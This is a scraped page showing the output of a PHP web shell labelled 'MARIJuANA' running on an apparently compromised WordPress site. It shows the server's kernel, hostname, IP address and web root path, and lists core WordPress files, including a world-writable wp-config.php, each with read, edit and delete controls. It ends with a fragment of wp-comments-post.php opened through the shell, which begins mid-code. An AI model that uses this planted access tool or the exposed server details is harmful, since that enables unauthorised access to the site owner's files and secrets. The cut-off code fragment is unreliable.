MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux vmi1602879.contaboserver.net 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
  SOFT : Apache PHP : 8.2.19
/www/wwwroot/wordpress2.thedevelopment.in/dd/liliduro/
161.97.120.115

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
.tmb dir drwxrwxrwx 2025-06-06 08:11 R D
wp-admin dir drwxr-xr-x 2024-09-10 15:23 R D
wp-content dir drwxr-xr-x 2025-06-11 13:39 R D
wp-includes dir drwxr-xr-x 2025-04-19 11:38 R D
.htaccess 0.534 KB -rw-r--r-- 2024-10-14 06:22 R E G D
index.php 0.396 KB -rw-r--r-- 2020-02-06 06:33 R E G D
license.txt 19.437 KB -rw-r--r-- 2025-04-19 11:38 R E G D
readme.html 7.251 KB -rw-r--r-- 2025-05-02 23:21 R E G D
wp-activate.php 7.214 KB -rw-r--r-- 2024-02-13 14:19 R E G D
wp-blog-header.php 0.343 KB -rw-r--r-- 2020-02-06 06:33 R E G D
wp-comments-post.php 2.269 KB -rw-r--r-- 2023-06-14 14:11 R E G D
wp-config-sample.php 3.258 KB -rw-r--r-- 2024-11-18 02:19 R E G D
wp-config.php 3.217 KB -rw-rw-rw- 2024-11-06 13:56 R E G D
wp-cron.php 5.485 KB -rw-r--r-- 2024-11-18 02:19 R E G D
wp-load.php 3.845 KB -rw-r--r-- 2024-03-11 10:05 R E G D
wp-login.php 50.209 KB -rw-r--r-- 2025-04-19 11:38 R E G D
wp-mail.php 8.522 KB -rw-r--r-- 2025-04-19 11:38 R E G D
wp-settings.php 29.376 KB -rw-r--r-- 2025-04-19 11:38 R E G D
wp-signup.php 33.707 KB -rw-r--r-- 2025-04-19 11:38 R E G D
wp-trackback.php 4.982 KB -rw-r--r-- 2024-11-18 02:19 R E G D
xmlrpc.php 3.13 KB -rw-r--r-- 2025-04-19 11:38 R E G D
REQUEST EXIT
get_error_data(); if ( ! empty( $data ) ) { wp_die( '

' . $comment->get_error_message() . '

', __( 'Comment Submission Failure' ), array( 'response' => $data, 'back_link' => true, ) ); } else { exit; } } $user = wp_get_current_user(); $cookies_consent = ( isset( $_POST['wp-comment-cookies-consent'] ) ); /** * Fires after comment cookies are set. * * @since 3.4.0 * @since 4.9.6 The `$cookies_consent` parameter was added. * * @param WP_Comment $comment Comment object. * @param WP_User $user Comment author's user object. The user may not exist. * @param bool $cookies_consent Comment author's consent to store cookies. */ do_action( 'set_comment_cookies', $comment, $user, $cookies_consent ); $location = empty( $_POST['redirect_to'] ) ? get_comment_link( $comment ) : $_POST['redirect_to'] . '#comment-' . $comment->comment_ID; // If user didn't consent to cookies, add specific query arguments to display the awaiting moderation message. if ( ! $cookies_consent && 'unapproved' === wp_get_comment_status( $comment ) && ! empty( $comment->comment_author_email ) ) { $location = add_query_arg( array( 'unapproved' => $comment->comment_ID, 'moderation-hash' => wp_hash( $comment->comment_date_gmt ), ), $location ); } /** * Filters the location URI to send the commenter after posting. * * @since 2.0.5 * * @param string $location The 'redirect_to' URI sent via $_POST. * @param WP_Comment $comment Comment object. */ $location = apply_filters( 'comment_post_redirect', $location, $comment ); wp_safe_redirect( $location ); exit;